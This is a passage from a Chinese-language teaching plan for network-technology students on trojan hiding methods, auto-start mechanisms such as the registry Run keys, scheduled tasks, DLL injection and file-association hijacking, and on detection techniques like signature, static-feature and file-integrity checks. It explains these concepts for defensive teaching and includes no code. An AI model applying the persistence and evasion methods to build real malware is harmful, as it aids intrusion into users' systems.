點：計算機網(wǎng)絡(luò)技術(shù)專業(yè)學生，基礎(chǔ)知識存在差異，需針對性講解與實踐操作結(jié)合。學習習慣：偏愛實踐性強的課程，理論學習興趣較低。樂于通過案例和互動式教學理解知識點。重難點分析教學重點1.木馬的典型隱藏方式與啟動機制理解。2.木馬檢測技術(shù)的原理與類型區(qū)分。3.火絨劍、D盾、Webshell掃描器的實際使用方法。教學難點1.行為分析與虛擬機檢測等動態(tài)檢測技術(shù)的理解。2.判斷未知程序是否為木馬的邏輯分析能力。3.工具操作中對可疑文件判斷的準確性與處理策略。信息化應(yīng)用方法通過課件、視頻、案例分析、互動提問等多種信息化方式，借助學習通平臺發(fā)布學習資源和任務(wù)，學生自主學習并完成任務(wù)。課程思政元素1.網(wǎng)絡(luò)安全事關(guān)國家安全，培養(yǎng)學生的家國情懷與責任感。2.樹立服務(wù)意識，塑造職業(yè)精神，使學生形成運用所學專業(yè)知識為社會貢獻的責任感。3.鍛煉學生實事求是的工作態(tài)度，培養(yǎng)學生嚴謹細致的工作作風、精益求精的工匠精神。教學實施過程課前：平臺發(fā)布病毒與木馬的認知與防護任務(wù)3學習任務(wù)，學生預(yù)習。課中：導(dǎo)入新課眾智科技深知木馬入侵可能對客戶信息系統(tǒng)帶來嚴重威脅。通過上次的系統(tǒng)入侵演示，客戶深度了解到木馬的危害。因此，客戶要求為其提供幾個簡單的木馬檢測工具及操作方法，以便后續(xù)及時發(fā)現(xiàn)并規(guī)避潛在的安全風險。任務(wù)一知識點講解一.木馬的隱藏為了能在目標系統(tǒng)中長時間存在而不被發(fā)現(xiàn)或清除，木馬通過各種隱藏技術(shù)，如進程隱藏、文件隱藏、注冊表隱藏等，躲避用戶的直接觀察和常規(guī)安全軟件的檢測。常見的木馬隱藏方式有以下幾種。1．進程隱藏通過修改操作系統(tǒng)的核心組件，木馬可以隱藏其進程、線程或文件，使得常規(guī)工具（如任務(wù)管理器等）無法檢測到它們。通過DLL（DynamicLinkedLibrary，動態(tài)連接庫）注入，木馬將自身注入其他合法進程之中，利用這些進程作為宿主，從而掩蓋其存在。木馬進程可使用與系統(tǒng)進程相似的名稱，以混淆視聽，實現(xiàn)隱藏。2．文件隱藏通過隱寫，可以將木馬代碼嵌入看似無害的文件中，如圖片、文檔或音頻文件。通過加密與壓縮木馬文件，可以使其看起來像普通數(shù)據(jù)文件。通過藏身于硬盤的空閑扇區(qū)，木馬可避免直接文件系統(tǒng)檢測。3．注冊表隱藏木馬可以通過修改注冊表啟動項或?qū)⒆陨硖砑拥阶员硐到y(tǒng)服務(wù)中，利用系統(tǒng)自身的啟動機制進行隱藏。二、木馬的啟動木馬為了能夠在目標計算機上持久運行并執(zhí)行其惡意任務(wù)，采用了多種啟動方式來確保每次系統(tǒng)啟動時其都能自動加載。以下是木馬的幾種主要啟動方式，這些方式涵蓋從傳統(tǒng)的Windows系統(tǒng)機制到更隱蔽的技術(shù)手段。1．注冊表啟動木馬通過修改注冊表中的特定鍵值來實現(xiàn)自啟動。主要涉及的鍵值包括：HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run這些鍵值決定了系統(tǒng)啟動時自動運行的程序列表。2．文件夾啟動在用戶的“啟動”文件夾中放置快捷方式或可執(zhí)行文件，使得用戶每次登錄時木馬都能自啟動。3．服務(wù)或驅(qū)動啟動木馬將自己注冊為系統(tǒng)服務(wù)或設(shè)備驅(qū)動，這些服務(wù)或驅(qū)動在系統(tǒng)啟動時會自動加載。由于服務(wù)或驅(qū)動運行在較高的權(quán)限級別下，使得木馬能夠擁有更多系統(tǒng)權(quán)限。4．任務(wù)計劃程序啟動利用Windows的任務(wù)計劃程序創(chuàng)建任務(wù)，設(shè)置木馬在特定時間或系統(tǒng)事件觸發(fā)時自啟動。5．DLL注入與掛鉤啟動木馬通過將惡意DLL注入其他合法進程中，或掛鉤系統(tǒng)API（ApplicationProgramInterface，應(yīng)用程序接口）調(diào)用，從而在這些程序啟動時激活木馬功能。6．文件關(guān)聯(lián)劫持啟動改變文件類型關(guān)聯(lián)，這樣當用戶嘗試打開某一類型的文件時，實際上激活的是木馬程序而非預(yù)期的應(yīng)用。例如，木馬可能會篡改系統(tǒng)中常用文件類型的打開方式，如將DOC、JPG或TXT等文件類型與一個看似合法但實際上包含惡意代碼的程序關(guān)聯(lián)起來。這樣，當用戶試圖打開一個看似無害的文檔或圖片時，實際上激活的是木馬。三、主流的木馬檢測技術(shù)簡介木馬作為一種隱蔽性強、危害性大的惡意軟件，持續(xù)對個人用戶、企業(yè)網(wǎng)絡(luò)乃至國家安全構(gòu)成嚴峻威脅。為了有效抵御這一威脅，安全專家與研究人員不斷探索與革新木馬檢測技術(shù)，力求在惡意軟件造成實際損害前將其識別并阻斷，主流的木馬檢測技術(shù)介紹如下。（1）特征碼檢測技術(shù)。特征碼檢測技術(shù)是反病毒反木馬領(lǐng)域較早使用的技術(shù)，也是目前公認的最成熟、最有效的木馬檢測技術(shù)之一。即便現(xiàn)在動態(tài)檢測技術(shù)發(fā)展如此迅速，也沒有撼動特征碼檢測技術(shù)的地位。特征碼檢測技術(shù)準確性高、誤報率低、檢測速度快的優(yōu)點是大多數(shù)檢測技術(shù)無法比擬的，因此一直被殺毒軟件廣泛使用并且沿用至今。特征碼檢測技術(shù)主要包括基于特征碼的靜態(tài)掃描、廣譜特征碼掃描和內(nèi)存特征碼比對技術(shù)3類。（2）基于文件靜態(tài)特征的檢測技術(shù)。木馬程序的本質(zhì)是可執(zhí)行文件。通常Windows操作系統(tǒng)中的EXE文件和32位的DLL文件都采用的是PE格式。由于PE文件具有規(guī)范的結(jié)構(gòu)，因此可以利用數(shù)據(jù)挖掘等信息處理技術(shù)分析木馬文件與正常的可執(zhí)行文件的靜態(tài)特征。通過研究兩者的區(qū)別，找出木馬文件不同于正常的可執(zhí)行文件的特征，用于木馬的檢測。（3）文件完整性檢測技術(shù)。由于木馬感染計算機后通常會修改某些系統(tǒng)文件，因此可以通過檢查系統(tǒng)文件的完整性來判斷木馬是否存在。文件完整性檢測技術(shù)又稱校驗和檢測技術(shù)，其基本原理是在系統(tǒng)正常的情況下對所有的系統(tǒng)文件做校驗，得到每個系統(tǒng)文件的校驗和，并將其保存到數(shù)據(jù)庫中。在后續(xù)檢測時，首先計算當前狀態(tài)下系統(tǒng)文件的校驗和，然后將其與數(shù)據(jù)庫中保存的完整的校驗和做比較，如果出現(xiàn)某個系統(tǒng)文件的兩個校驗和不一致，則認為此文件的完整性被破壞，即此文件被修改過，則當前計算機有可能感染了木馬。（4）虛擬機檢測技術(shù)。虛擬